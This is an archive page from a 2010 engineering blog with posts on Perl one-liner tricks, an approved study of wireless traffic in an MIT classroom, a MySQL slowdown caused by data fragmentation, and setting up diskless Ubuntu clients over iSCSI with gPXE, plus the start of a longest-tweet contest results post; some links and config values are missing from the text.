Well, I don't know about you, but I'm glad there's a query planner making all these choices for me. I'm ready to head over to Fenway, dump beer on Yankees fans, and pretend to be a sabermetrician. Anyone have a MySQL or Oracle instance handy? How do their query plans compare for these queries?


Wednesday May 26, 2010

The top 10 tricks of Perl one-liners

I'm a recovering perl hacker. Perl used to be far and away my language of choice, but these days I'm more likely to write new code in Python, largely because far more of my friends and coworkers are comfortable with it.

I'll never give up perl for quick one-liners on the command-line or in one-off scripts for munging text, though. Anything that lasts long enough to make it into git somewhere usually gets rewritten in Python, but nothing beats perl for interactive messing with text.

Perl, never afraid of obscure shorthands, has accrued an impressive number of features that help with this use case. I'd like to share some of my favorites that you might not have heard of.

One-liners primer

We'll start with a brief refresher on the basics of perl one-liners before we begin. The core of any perl one-liner is the -e switch, which lets you pass a snippet of code on the command-line: perl -e 'print "hi\n"' prints "hi" to the console.

The second standard trick to perl one-liners are the -n and -p flags. Both of these make perl put an implicit loop around your program, running it once for each line of input, with the line in the $_ variable. -p also adds an implicit print at the end of each iteration.

Both of these use perl's special "ARGV" magic file handle internally. What this means is that if there are any files listed on the command-line after your -e, perl will loop over the contents of the files, one at a time. If there aren't any, it will fall back to looping over standard input.

perl -ne 'print if /foo/' acts a lot like grep foo, and perl -pe 's/foo/bar/' replaces foo with bar

Most of the rest of these tricks assume you're using either -n or -p, so I won't mention it every time.

The top 10 one-liner tricks

Trick #1: -l

Smart newline processing. Normally, perl hands you entire lines, including a trailing newline. With -l, it will strip the trailing newline off of any lines read, and automatically add a newline to anything you print (including via -p).

Suppose I wanted to strip trailing whitespace from a file. I might naïvely try something like

perl -pe 's/\s*$//'
The problem, however, is that the line ends with "\n", which is whitespace, and so that snippet will also remove all newlines from my file! -l solves the problem, by pulling off the newline before handing my script the line, and then tacking a new one on afterwards:
perl -lpe 's/\s*$//'

Trick #2: -0

Occasionally, it's useful to run a script over an entire file, or over larger chunks at once. -0 makes -n and -p feed you chunks split on NULL bytes instead of newlines. This is often useful for, e.g. processing the output of find -print0. Furthermore, perl -0777 makes perl not do any splitting, and pass entire files to your script in $_.

find . -name '*~' -print0 | perl -0ne unlink

Could be used to delete all ~-files in a directory tree, without having to remember how xargs works.

Trick #3: -i

-i tells perl to operate on files in-place. If you use -n or -p with -i, and you pass perl filenames on the command-line, perl will run your script on those files, and then replace their contents with the output. -i optionally accepts an backup suffix as argument; Perl will write backup copies of edited files to names with that suffix added.

perl -i.bak -ne 'print unless /^#/'

Would strip all whole-line commands from, but leave a copy of the original in

Trick #4: The .. operator

Perl's .. operator is a stateful operator -- it remembers state between evaluations. As long as its left operand is false, it returns false; Once the left hand returns true, it starts evaluating the right-hand operand until that becomes true, at which point, on the next iteration it resets to false and starts testing the other operand again.

What does that mean in practice? It's a range operator: It can be easily used to act on a range of lines in a file. For instance, I can extract all GPG public keys from a file using:

perl -ne 'print if /-----BEGIN PGP PUBLIC KEY BLOCK-----/../-----END PGP PUBLIC KEY BLOCK-----/' FILE
Trick #5: -a

-a turns on autosplit mode – perl will automatically split input lines on whitespace into the @F array. If you ever run into any advice that accidentally escaped from 1980 telling you to use awk because it automatically splits lines into fields, this is how you use perl to do the same thing without learning another, even worse, language.

As an example, you could print a list of files along with their link counts using

ls -l | perl -lane 'print "$F[7] $F[1]"'

Trick #6: -F

-F is used in conjunction with -a, to choose the delimiter on which to split lines. To print every user in /etc/passwd (which is colon-separated with the user in the first column), we could do:

perl -F: -lane 'print $F[0]' /etc/passwd
Trick #7: \K

\K is undoubtedly my favorite little-known-feature of Perl regular expressions. If \K appears in a regex, it causes the regex matcher to drop everything before that point from the internal record of "Which string did this regex match?". This is most useful in conjunction with s///, where it gives you a simple way to match a long expression, but only replace a suffix of it.

Suppose I want to replace the From: field in an email. We could write something like

perl -lape 's/(^From:).*/$1 Nelson Elhage <nelhage\>/'

But having to parenthesize the right bit and include the $1 is annoying and error-prone. We can simplify the regex by using \K to tell perl we won't want to replace the start of the match:

perl -lape 's/^From:\K.*/ Nelson Elhage <nelhage\>/'
Trick #8: $ENV{}

When you're writing a one-liner using -e in the shell, you generally want to quote it with ', so that dollar signs inside the one-liner aren't expanded by the shell. But that makes it annoying to use a ' inside your one-liner, since you can't escape a single quote inside of single quotes, in the shell.

Let's suppose we wanted to print the username of anyone in /etc/passwd whose name included an apostrophe. One option would be to use a standard shell-quoting trick to include the ':

perl -F: -lane 'print $F[0] if $F[4] =~ /'"'"'/' /etc/passwd

But counting apostrophes and backslashes gets old fast. A better option, in my opinion, is to use the environment to pass the regex into perl, which lets you dodge a layer of parsing entirely:

env re="'" perl -F: -lane 'print $F[0] if $F[4] =~ /$ENV{re}/' /etc/passwd

We use the env command to place the regex in a variable called re, which we can then refer to from the perl script through the %ENV hash. This way is slightly longer, but I find the savings in counting backslashes or quotes to be worth it, especially if you need to end up embedding strings with more than a single metacharacter.

Trick #9: BEGIN and END

BEGIN { ... } and END { ... } let you put code that gets run entirely before or after the loop over the lines.

For example, I could sum the values in the second column of a CSV file using:

perl -F, -lane '$t += $F[1]; END { print $t }'
Trick #10: -MRegexp::Common

Using -M on the command line tells perl to load the given module before running your code. There are thousands of modules available on CPAN, numerous of them potentially useful in one-liners, but one of my favorite for one-liner use is Regexp::Common, which, as its name suggests, contains regular expressions to match numerous commonly-used pieces of data.

The full set of regexes available in Regexp::Common is available in its documentation, but here's an example of where I might use it:

Neither the ifconfig nor the ip tool that is supposed to replace it provide, as far as I know, an easy way of extracting information for use by scripts. The ifdata program provides such an interface, but isn't installed everywhere. Using perl and Regexp::Common, however, we can do a pretty decent job of extracing an IP from ip's output:

ip address list eth0 | \

  perl -MRegexp::Common -lne 'print $1 if /($RE{net}{IPv4})/'

So, those are my favorite tricks, but I always love learning more. What tricks have you found or invented for messing with perl on the command-line? What's the most egregious perl "one-liner" you've wielded, continuing to tack on statements well after the point where you should have dropped your code into a real script?


Wednesday May 19, 2010

The wireless traffic of MIT students

Wireless traffic is both interesting and delightfully accessible thanks to the broadcast nature of 802.11. I have spent many a lazy weekend afternoon watching my laptop, the Tivo, and the router chatting away in a Wireshark window.

As fun as the wireless traffic in one's house may be, there's something to be said for being able to observe a much larger ecosystem - one with more people with a more diverse set of operating systems, browsers, and intentions as they work on their wireless-enabled devices, giving rise to more interesting background and active traffic patterns and a greater set of protocols in play.

Now, it happens to be the case that sniffing other people's wireless traffic breaks a number of federal and local laws, including wiretapping laws, and while I am interested in observing other people's wireless traffic, I'm not interested in breaking the law. Fortunately, Ksplice is down the road from a wonderful school that fosters this kind of intellectual curiosity.

I met with MIT's Information Services and Technology Security Team, and we came up with a plan for me to gather data that would satisfy MIT's Athena Rules of Use. I got permission from Robert Morris and Sam Madden to monitor the wireless traffic during their Computer Systems Engineering class and made an announcement at the beginning of a class period explaining what I'd be doing. Somewhat ironically, that day's lecture was an introduction to computer security.

Some interesting results from the data set collected are summarized below. Traffic was gathered with tcpdump on my laptop as I sat in the middle of the classroom. The data was imported into Wireshark, spit back out as a CSV, and imported into a sqlite database for aggregation queries, read back into tcpdump and filtered there, or hacked up with judicious use of grep, as different needs arose.

Protocol # Packets % Packets
MDNS 259932 30.46
TCP 245268 28.74
ICMPv6 116167 13.61
TPKT 78311 9.18
SSDP 31441 3.68
HTTP 28027 3.28
UDP 17006 1.99
LLMNR 16991 1.99
TLSv1 14390 1.69
DHCPv6 11572 1.36
DNS 10870 1.27
SSH 8804 1.03
SSLv3 3094 0.36
Jabber 2507 0.29
ARP 2003 0.23
SSHv2 1503 0.18
IGMP 1309 0.15
SNMP 1232 0.14
NBNS 619 0.073
WLCCP 513 0.060
AIM Buddylist 265 0.031
NTP 245 0.029
HTTP/XML 218 0.026
MSNMS 192 0.022
IP 139 0.016
AIM 121 0.014
SSL 105 0.012
IPv6 90 0.011
AIM Generic 84 0.0098
DHCP 64 0.0075
ICMP 60 0.0070
X.224 59 0.0069
AIM SST 45 0.0053
AIM Messaging 39 0.0046
BROWSER 37 0.0043
YMSG 35 0.0041
AARP 18 0.0021
OCSP 16 0.0019
AIM SSI 11 0.0013
SSLv2 8 0.00094
T.125 5 0.00059
AIM Signon 4 0.00047
NBP 4 0.00047
AIM BOS 3 0.00035
AIM ChatNav 3 0.00035
AIM Stats 3 0.00035
AIM Location 2 0.00023
ZIP 2 0.00023

Basic statistics
Time spent capturing: 45 minutes
Packets captured: 853436
Number of traffic sources in the room: 21
Number of distinct source and destination IPv4 and IPv6 addresses: 5117
Number of "active" traffic addresses (eg using HTTP, SSH, not background traffic): 581
Number of protocols represented: 48 (note that Wireshark buckets based on the top layer for a packet, so for example TCP is in this count because someone was sending actual TCP traffic without an application layer on top and not because TCP is the transport protocol for HTTP, which is also in this count). These protocols and how much traffic was sent over them are in the table on the left.

IPv4 v. IPv6
Number of IPv4 packets: 580547
Number of IPv6 packets: 270351

2.15 IPv4 packets were sent for every IPv6 packet. IPv6 was only used for background traffic, serving as the internet layer for the following protocols: DHCPv6, DNS, ICMPv6, LLMNR, MDNS, SSDP, TCP, and UDP. The TCP over IPv6 packets were all icslap, ldap, or wsdapi communications between our Windows user discussed below and his or her remote desktop. The UDP over IPv6 packets were all ws-discovery communications, part of a local multicast discovery protocol most likely being used by the Windows machines in the room.

Number of ICMP packets: 60
Number of ICMPv6 packets: 116167

1936.12 ICMPv6 packets were sent for every ICMP packet. The reason is that ICMPv6 is doing IPv6 work that is taken care of by other link layer protocols in IPv4. Looking at the ICMP and ICMPv6 packets by type:

ICMP Type/Code Pkts
Dest unreachable (Host administratively prohibited) 1
Dest unreachable (Port unreachable) 35
Echo (ping) request 9
Time-to-live exceeded in transit 15

ICMPv6 Type/Code Pkts
Echo request 8
Multicast Listener Report msg v2 7236
Multicast listener done 86
Multicast listener report 548
Neighbor advertisement 806
Neighbor solicitation 105710
Redirect 353
Router advertisement 461
Router solicitation 956
Time exceeded (In-transit) 1
Unknown (0x40) (Unknown (0x87)) 1
Unreachable (Port unreachable) 1

These ICMPv6 packets are mostly doing Neighbor Discover Protocol (NDP) and Multicast Listener Discovery (MLD) work. NDP handles router and neighbor solicitation and is similar to ARP and ICMP under IPv4, and MLD handles multicast listener discovery similar to IGMP under IPv4.

Number of TCP packets: 383122
Number of UDP packets: 350067

1.09 TCP packets were sent for every UDP packet. I would have thought TCP would be a clear winner, but given that MDNS traffic, which is over UDP, makes up over 30% of the packets captured, I guess this isn't surprising. The 14% of packets unaccounted for at the transport layer are mostly ARP and ICMP traffic. See also this post.

Instant Messenging

Awesomely, AIM, Jabber, MSN Messenger, and Yahoo! Messenger were all represented in the traffic:

Participants # Packets
AIM 22 580
Jabber 6 2507
YMSG 4 35
MSNMS 3 192

AIM is the clear favorite (at least with this small sample size). Note that Jabber has about 1/4th the AIM participants but 4x the number of packets. Either the Jabberers are extra chatty, or the fact that Jabber is an XML-based protocol inflates the size of a conversation dramatically on the wire. Note that some IM traffic (like Google Chat) might have instead been bucketed as HTTP/XML by Wireshark.

That Windows Remote Desktop Person

119489 packets, or 14% of the traffic, were between a computer in the classroom and what is with high probability a Windows machine on campus running the Microsoft Remote Desktop Protocol (see also this support page for a discussion of the protocol specifics).

RDP traffic from client to remote desktop: T.125, TCP, TPKT, X.224
RDP traffic from remote desktop to client: TCP, TPKT

Most of the traffic is T.125 payload packets. TPKTs encapulate transport protocol data units (TPDUs) in the ISO Transport Service on top of TCP. TPKT traffic was all "Continuation" traffic. X.224 transmits status and error codes. TCP "ms-wbt-server" traffic to port 3389 on the remote machine seals the deal on this being an RDP setup.


All SSH and SSHv2 traffic was to Linerva, a public-access Linux server run by SIPB for the MIT community, except for one person talking to a personal server on campus.

Protocol # Packets % Packets
TLSv1 14390 81.8
SSLv3 3094 17.6
SSL 105 .59
SSLv2 8 .045

5 clients were involved with negotiations with SSLv2, which is insecure and disabled by default on most browsers and never got past a "Client Hello".


I wanted to be able to answer questions like "what were the top 20 most visited website" in this traffic capture. The proliferation of content distribution networks makes it harder to track all traffic associated with a popular website by IP addresses or hostnames. I ended up doing a crude but quick grep "Host:" pcap.plaintext | sort | uniq -c | sort -n -r on the expanded plaintext version of the data exported from Wireshark, which gives the most visited hosts based on the number of GET requests. The top 20 most visited hosts by that method were:

Rank GETs Host Rank GETs Host
1 336 11 88
2 229 12 87
3 211 13 66
4 167 14 66
5 149 15 64
6 114 16 61
7 113 17 57
8 111 18 56
9 93 19 56
10 90 20 55

Alas, pretty boring. The blogcdn, blogsmith and eyewonder hosts are all for Engadget, and fbcdn is part of Facebook. I'll admit that I'd been a little hopeful that some enterprising student would try to screw up my data by scripting visits to a bunch of porn sites or something. CDNs dominate the top 20, and in fact almost all of the roughly 410 web server IP addresses gathered are for CDNs. Akamai led with 39 distinct IPs, followed by Amazon AWS with 23, and Facebook and Panther CDN with 16, with many more at lower numbers.


Using the Internet means a lot more than HTTP traffic! 45 minutes of traffic capture gave us 48 protocols to explore. Most of the captured traffic was background traffic, and in particular discovery traffic local to the subnet.

Sniffing wireless traffic (legally) is a great way to learn about networking protocols and the way the Internet works in practice. It can also be incredibly useful for debugging networking problems.

What are some of your fun or awful networking experiences?


Wednesday May 12, 2010

Constant factors: constantly foiling you

There are many different kinds of bugs with many different causes. Sometimes, it's just some silly typo or type mismatch; other times, it's an algorithmic issue or a correctness error; and occasionally, it appears to be something much stranger. This is a story about that last kind of bug, where finding the location of the problem is relatively straightforward, but figuring out how to fix it, or even why it's happening, isn't so easy.

We first meet our hero, yours truly, as he debugs an efficiency problem in a particular program for what is now the third day in a row. This program is actually just a small part in an otherwise large and complex system that Ksplice uses for its internal operations, at the heart of which lies a large collection of data, stored in a carefully constructed and extensively optimized MySQL database.

But this had not always been the case. In the past, much of the data was stored in a large collection of JSON-encoded archives. Seamlessly moving all that data to MySQL was a project that I had been involved in, and this was, in a sense, the final stage of the transition. We still had the JSON files, but having moved to a much shinier and spiffier database, it seemed a good idea to port all the programs that used the data to it as well.

Now, this particular program was designed to make five queries to the MySQL database — all totally identical except for a time column that all the rows contained. The queries each covered a different 48-hour period, distributed at various points throughout the last two months (relative when the program gets run).

These queries seemed simple enough, but mysteriously, the queries for older time periods, which returned fewer rows, also took considerably longer to run!

Eventually, I was able to reduce this to a consistently reproducible example:

mysql> SELECT COUNT(*) FROM events
        WHERE time > '2010-04-25' AND time < '2010-04-27';

| COUNT(*) |
|  1196740 |

1 row in set (12.13 sec)

mysql> SELECT COUNT(*) FROM events
        WHERE time > '2010-02-24' AND time < '2010-02-26';

| COUNT(*) |
|   740034 |

1 row in set (61.92 sec)

As you can see, the more recent range has about a million rows and took just over 12 seconds to run. The older range has just over half as many, but takes almost 5 times as long. This really doesn't make any sense — after all, the queries are totally identical except for the ranges we are looking across, and those ranges are of completely equal sizes. There really shouldn't be such a huge disparity in the running times.

Let's look at how MySQL is performing these queries:

                                 WHERE time > '2010-04-25' AND time < '2010-04-27';

| id | select_type | table  | type  | possible_keys | key         | key_len | ref  | rows    | filtered | Extra                    |
|  1 | SIMPLE      | events | range | events_time   | events_time | 8       | NULL | 2234568 |   100.00 | Using where; Using index |

1 row in set, 1 warning (0.04 sec)


                         WHERE time > '2010-02-24' AND time < '2010-02-26';

| id | select_type | table  | type  | possible_keys | key         | key_len | ref  | rows    | filtered | Extra                    |
|  1 | SIMPLE      | events | range | events_time   | events_time | 8       | NULL | 1202716 |   100.00 | Using where; Using index |

1 row in set, 1 warning (0.04 sec)

Besides confirming that we are using an index on the time column, there isn't too much here. I tried using MySQL's built in profiler by running SET PROFILING = 1 and then, after rerunning the second query, running


| Status             | Duration  |
| starting           |  0.000116 |
| Opening tables     |  0.000018 |
| System lock        |  0.000006 |
| Table lock         |  0.000013 |
| init               |  0.000032 |
| optimizing         |  0.000016 |
| statistics         |  0.047627 |
| preparing          |  0.000038 |
| executing          |  0.000007 |
| Sending data       | 62.852915 |
| end                |  0.000035 |
| query end          |  0.000007 |
| freeing items      |  0.000047 |
| logging slow query |  0.000005 |
| cleaning up        |  0.000005 |

15 rows in set (0.03 sec)

Huh. Pretty much all of the time is spent "sending data". What the heck is going on?

Fragmented Database
Fragmented Database. For the newer events, we can just get them all in one go, since they're already sorted by time.

The answer turns out to be fragmentation. Remember when I said that we had migrated to this database from an older flat-file based one? Well, those files weren't read and inserted into the database in the chronological order of their contents, but rather based on the contents itself. So the old data that we inserted was fragmented across the database relative the time column. Newer data, on the other hand, was inserted as it comes in, so it is already pretty much ordered by time.

MySQL stores its indices using B-trees, so we can locate any given row (or range of rows) in logarithmic time. But unfortunately we can't just get any random row off the disk immediately. Instead, MySQL can only read data off the disk on the granularity of a page, which means that for a row living in a page that hasn't yet been read into memory, we have to first do a disk seek to load the right page.

Since the rows are fragmented across the disk, we have to do far more expensive disk seeks. So even though we're getting fewer total rows and the query is locating them in logarithmic time, the constant factor ends up being very large due to all the disk seeking.

What are your favorite bitten-by-a-constant-factor stories?


Wednesday May 05, 2010

PXE dust: scalable day-to-day diskless booting

If you're a veteran system administrator, you might remember an era of extremely expensive hard disk storage, when any serious network would have a beefy central file server (probably accessed using the Network File System, NFS) that formed the lifeblood of its operations. It was a well-loved feature as early as Linux kernel 2.0 that you could actually boot your machine with a root filesystem in NFS and have no local disk at all. Hardware costs went down, similar machines could share large parts of their system binaries, upgrades could be done without touching anything but the central server—sysadmins loved this.

But that was then. Diskless booting these days seems a lot less common, even though the technology still exists. You hear about supercomputer clusters using it, but not the "typical" IT department. What happened?

Part of it, I'm sure, is that hard disks became speedier and cheaper more quickly than consumer network technology gained performance. With local disks, it's still difficult to roll out updates to a hundred or a thousand computers simultaneously, but many groups don't start with a hundred or a thousand computers, and multicast system re-imaging software like Norton Ghost prevents the hassle from being unbearable enough to force a switch.

More important, though, is that after a few years of real innovation, the de facto standard in network booting has been stagnant for over a decade. Back in 1993, when the fastest Ethernet anyone could use transferred a little over a megabyte of data per second and IDE hard drives didn't go much faster, network card managers were already including boot ROMs on their expansion cards, each following its own proprietary protocol for loading and executing a bootstrap program. A first effort at standardization, Jamie Honan's "Net Boot Image Proposal", was informally published that year, and soon enough two open-source projects, Etherboot (1995) and Netboot (1996), were providing generic ROM images with pluggable driver support. (Full disclosure: I'm an Etherboot Project developer.) They took care of downloading and executing a boot file, but that file would have no way of going back to the network for more data unless it had a network card driver built in. These tools thus became rather popular for booting Linux, and largely useless for booting simpler system management utilities that couldn't afford the maintenance cost of their own network stack and drivers.

Around this time, Intel was looking at diskless booting from a more commercial point of view: it made management easier, consolidated resources, avoided leaving sysadmins at the mercy of users who broke their systems thinking themselves experts. They published a specification for the Preboot Execution Environment (PXE), as part of a larger initiative called Wired for Management. Network cards started replacing their proprietary boot ROMs with PXE, and things looked pretty good; the venerable SYSLINUX bootloader grew a PXELINUX variant for PXE-booting Linux, and a number of enterprise system management utilities became available in PXE-bootable form.

But, for whatever reason, the standard hasn't been updated since 1999. It still operates in terms of the ancient x86 real mode, only supports UDP and a "slow, simple, and stupid" file transfer protocol called TFTP, and officially limits boot program size to 32kB. For modern-day applications, this is less than ideal.

Luckily for us, the Etherboot Project still exists, and Etherboot's successor gPXE has been picking up where Intel left off, and supports a number of more modern protocols. Between that, excellent support in recent Linux kernels for both accessing and serving SAN disks with high performance, and the flexibility gained by booting with an initial ramdisk, diskless booting is making a big comeback. It's not even very hard to set up: read on!

The general idea

PXE booting flowchart
PXE Booting Flowchart

While it can get a lot more complicated to support boot menus and proprietary operating systems, the basic netbooting process these days is pretty straightforward. The PXE firmware (usually burned into ROM on the network card) performs a DHCP request, just like most networked computers do to get an IP address. The DHCP server has been configured to provide additional "options" in its reply, specifying where to find boot files. All PXE stacks support booting from a file (a network bootstrap program, NBP); PXELINUX is the NBP most commonly used for booting Linux. The NBP can call back to the PXE stack to ask it to download more files using TFTP.

Alternatively, some PXE stacks (including gPXE) support booting from a networked disk, accessed using a SAN protocol like ATA over Ethernet or iSCSI. Since it's running in real mode, the firmware can hook the interrupt table to cause other boot-time programs (like the GRUB bootloader) to see an extra hard disk attached to the system; unbeknownst to these programs, requests to read sectors from that hard disk are actually being routed over the network.

If you want to boot a real-mode operating system like DOS, you can stop there; DOS never looks beyond the hooked interrupt, so it never has to know about the network at all. We're interested in booting Linux, though, and Linux has to manage the network card itself. When the kernel is booted, the PXE firmware becomes inaccessible, so it falls to the initial ramdisk (initrd or initramfs) to establish its own connection to the boot server so it can mount the root filesystem.

Setting up the client

We're going to walk through setting up network booting for a group of similar Ubuntu Lucid systems using disk images served over iSCSI. (The instructions should work with Karmic as well.) iSCSI runs on top of a TCP/IP stack, so it'll work fine within your current network infrastructure. Even over 100Mbps Ethernet, it's not significantly slower than a local disk boot, and certainly faster than a live CD. Rebooting may be obsolete, but short bootup times are still good to have!

You'll want to start by installing one Ubuntu system and configuring it how you'll want all of your diskless clients to be configured. There's room for individual configuration (like setting unique hostnames and maybe passwords) later on, but the more you can do once here, the less you'll have to do or script for all however-many clients you have. When they're booted, the clients will find your networked drive just like a real hard drive; it'll show up as /dev/sda, in /proc/scsi/scsi, and so forth, so you can pretty much configure them just like any local machine.

No matter what site-specific configuration choices you make, there are some steps you'll need to perform to make the image iSCSI bootable. First, you'll need to install the iSCSI initiator, which makes the connection to the server housing the boot disk image:

client# aptitude install open-iscsi

That connection will need to occur during the earliest stages of bootup, in the scripts on the initial ramdisk. open-iscsi can automatically update the initramfs to find and mount the iSCSI device, but it assumes you'll be setting a bunch of parameters in a configuration file to point it in the right place. It's quite cumbersome to set this up separately for every node, so I have prepared a patch that will make the initramfs automatically set these values based on the "boot firmware table" created by the iSCSI boot firmware from the information provided by your DHCP server. You should apply it now with

client# wget
client# patch -p0 -i ubuntu-iscsi-ibft.patch
patching file /usr/share/initramfs-tools/hooks/iscsi
patching file /usr/share/initramfs-tools/scripts/local-top/iscsi

Next, tell the setup scripts you want boot-time iSCSI and regenerate the ramdisk to include your modifications:

client# touch /etc/iscsi/iscsi.initramfs
client# update-initramfs -u

Finally, make sure the clients will get an IP address at boot time, so they can get to their root filesystem:

client# vi /etc/default/grub
    [find the GRUB_CMDLINE_LINUX line and add ip=dhcp to it;
     e.g. GRUB_CMDLINE_LINUX="" becomes GRUB_CMDLINE_LINUX="ip=dhcp"]
client# update-grub

Setting up the storage

Let's assume you've set up the prototype client as above, and you now have an image of its hard disk in a file somewhere. Because the disk-level utilities we'll be using don't know how to deal with files, it's necessary to create a loop device to bridge the two:

server# losetup -v -f /path/to/ubuntu-image
Loop device is /dev/loop0
If you get different output, or if the client disk image you created is already on a "real" block device (e.g. using LVM), replace /dev/loop0 with that device in the below examples.

You may be familiar with the Linux device mapper, probably as the backend behind LVM, but there's a lot more it can do. In particular, it gives us very easy copy-on-write (COW) semantics: you can create multiple overlays on a shared image, such that writes to the overlay get stored separately from the underlying image, reads of areas you've written come from the overlay, and reads of areas you've not modified come from the underlying image, all transparently. The shared image is not modified, and the overlays are only as large as is necessary to store each one's changes. Let's suppose you've got some space in /cow that you want to use for the overlay images; then you can create five of them named /cow/overlay-1.img through /cow/overlay-5.img with

server# for i in $(seq 1 5); do
> dd if=/dev/zero of=/cow/overlay-$i.img bs=512 count=1 seek=10M
> done
(10M blocks * 512 bytes per block = 5GB per overlay; this represents the amount of new data that can be written "on top of" the base image.)

Now for the fun part. The aforementioned snapshot functionality is provided by the dm-snapshot module; it's a standard part of the Linux device mapper, but you might not have it loaded if you've not used the snapshotting feature before. Rectify that if necessary:

server# modprobe dm-snapshot
and set up the copy-on-write like this:
server# for i in $(seq 1 5); do
> loopdev=$(losetup -f)
> losetup $loopdev /cow/overlay-$i.img
> echo "0 $(blockdev --getsize /dev/loop0) snapshot /dev/loop0 $loopdev p 8" | dmsetup create image-$i
> done

This sequence of commands assigns a loopback device to each COW overlay file (to make it look like a normal block device) and creates a bunch of /dev/mapper/image-n devices from which each client will boot. The 8 in the above line is the "chunk size" in 512-byte blocks, i.e. the size of the modified regions that the overlay device will record. A large chunk size wastes more disk space if you're only modifying a byte here and there, but may increase performance by lowering the overhead of the COW setup. p makes the overlays "persistent"; i.e., all relevant state is stored in the image itself, so it can survive a reboot.

You can tear down the overlays with dmsetup remove:

server# for i in $(seq 1 5); do
> dmsetup remove image-$i
> done

It's generally not safe to modify the base image when there are overlays on top of it. However, if you script the changes (hostname and such) that you need to make in the overlays, it should be pretty easy to just blow away the COW files and regenerate everything when you need to do an upgrade.

The loopback device and dmsetup configuration need to be performed again after every reboot, but you can reuse the /cow/overlay-n.img files.

Setting up the server for iSCSI

We now have five client images set up to boot over iSCSI; currently they're all passing reads through to the single prototype client image, but when the clients start writing to their disks they won't interfere with each other. All that remains is to set up the iSCSI server and actually boot the clients.

The iSCSI server we'll be using is called ietd, the iSCSI Enterprise Target daemon; there are several others available, but ietd is simple and mature—perfect for our purposes. Install it:

server# aptitude install iscsitarget

Next, we need to tell ietd where it can find our disk images. The relevant configuration file is /etc/ietd.conf; edit it and add lines like the following:

    Lun 0 Path=/dev/mapper/image-0,Type=blockio
    Lun 0 Path=/dev/mapper/image-1,Type=blockio

Each Target line names an image that can be mounted over iSCSI, using a hierarchical naming scheme called the "iSCSI Qualified Name" or IQN. In the example above, the com.ksplice.servertest should be replaced with the reverse DNS name of your organization's domain, and 2008-01 with a year and month as of which that name validly referred to you. The part after the colon determines the specific resource being named; in this case these are the client drives client-0, client-1, etc. None of this is required—your clients will quite happily boot images introduced as Target worfle-blarg—but it's customary, and useful in managing large setups. The Lun 0 line specifies a backing store to use for the first SCSI logical unit number of the exported device. (Multi-LUN configurations are outside the scope of this post.)

Edit /etc/default/iscsitarget and change the one line in that file to:

You can then start ietd with
server# /etc/init.d/iscsitarget start

To test that it's working, you can install open-iscsi and ask the server what images it's serving up:

server# aptitude install open-iscsi
server# iscsiadm -m discovery -p localhost -t sendtargets

Setting up DHCP

The only piece that remains is somehow communicating to your clients what they'll be booting from; if they're diskless, they don't have any way to read that information locally. Luckily, you probably already have a DHCP server set up in your organization, and as we mentioned before, it can hand out boot information just as easily as it can hand out IP addresses. You need to have it supply the root-path option (number 17); detailed instructions for ISC dhcpd, the most popular DHCP server, are below.

In order to make sure each client gets the right disk, you'll need to know their MAC addresses; for this demo's sake, we'll assume the addresses are 52:54:00:00:00:0n where n is the client number (1 through 5). Then the lines you'll need to add to /etc/dhcpd.conf, inside the subnet block corresponding to your network, look like this:

        host client-1 {
                hardware ethernet 52:54:00:00:00:01;
                option root-path "";

        host client-2 {
                hardware ethernet 52:54:00:00:00:02;
                option root-path "";

Replace with the IP address of your iSCSI server. The syntax of the root-path option is actually iscsi:server:protocol:port:lun:iqn, but the middle three fields can be left blank because the defaults (TCP, port 3260, LUN 0) are exactly what we want.

Booting the clients

If your clients are equipped with particularly high-end, "server" network cards, you can likely boot them now and everything will Just Work. Most network cards, though, don't contain an iSCSI initiator; they only know how to boot files downloaded using TFTP. To bridge the gap, we'll be using gPXE.

gPXE is a very flexible open-source boot firmware that implements the PXE standard as well as a number of extensions: you can download files over HTTP, use symbolic DNS names instead of IP addresses, and (most importantly for our purposes) boot off a SAN disk served over iSCSI. You can burn gPXE into your network card, replacing the less-capable PXE firmware, but that's likely more hassle than you'd like to go to. You can start it from a CD or USB key, which is great for testing. For long-term use you probably want to set up PXE chainloading; the basic idea is to configure the DHCP server to hand out your root-path when it gets a DHCP request with user class "gPXE", and the gPXE firmware (in PXE netboot program format) when it gets a request without that user class (coming from your network card's simple PXE firmware).

For now, let's go the easy-testing route and start gPXE from a CD. Download this 600kB ISO image, burn it to a CD, and boot one of your client machines using it. It will automatically perform DHCP and boot, yielding output something like the below:

gPXE 1.0.0+ -- Open Source Boot Firmware --

net0: 52:54:00:00:00:01 on PCI00:03.0 (open)
  [Link:up, TX:0 TXE:0 RX:0 RXE:0]
DHCP (net0 52:54:00:00:00:01).... ok
net0: gw
Booting from root path ""
Registered as BIOS drive 0x80
Booting from BIOS drive 0x80
after which, thanks to the client setup peformed earlier, the boot will proceed just like from a local hard disk. You can eject the CD out as soon as you see the gPXE banner; it's just being used as an oversized ROM chip here.

You'll probably want to boot each client in turn and, at a minimum, set its hostname to something unique. It's also possible to script this on the server side by using kpartx on the /dev/mapper/image-n devices, mounting each client's root partition, and modifying the configuration files therein.

That's it: if you've followed these instructions, you now have a basic but complete architecture for network booting a bunch of similar clients. You've set up servers to handle iSCSI and DHCP, set up one prototype client from which client disks can be automatically generated, and can easily scale to hosting many more clients just by increasing the number 5 to something larger. (You'd probably want to switch to using LVM logical volumes instead of file-backed loopback devices for performance reasons, though.) The number of clients you can quickly provision is limited only by the capacity of your network. And the next time one of your users decides their computer is an excellent place to stick refrigerator magnets, they won't be creating any additional headaches for you.


Monday Apr 19, 2010

1st International Longest Tweet Contest: The Winners

How much information is in a tweet?

A month ago, we asked that question, in the First International Longest Tweet Contest. The most longwinded tweeters on earth answered the call. The result: about 4,370 bits.

Congrats to the entrants, and best of luck honing your entries for next year! Ksplice is pleased to award our acclaimed, limited-edition T-shirts to the top three contenders.

In no particular order, they are:

  • Todd Lehman

    Mr. Lehman's entry, originally posted as a blog comment, was mathematically elegant. The scheme is simple: use the fact that Twitter allows each "character" to be a 31-bit UCS-4 code position -- there are 231, or 2,147,483,648 of them. Make use of all the bits you can without straying into legitimate Unicode (i.e. the first 1,114,112 code positions), since Twitter represents real Unicode differently and could cause ambiguities. That leaves 2,146,369,536 legal values for each "character."

    Mr. Lehman's scheme represents the input as a 4339-bit integer, and simply repeatedly divides the number by 2,146,369,536. The remainder of each division, he encodes into each character. Nice! His entry includes a partial implementation in Java.

  • C-P and Adam from Defcon Group 949

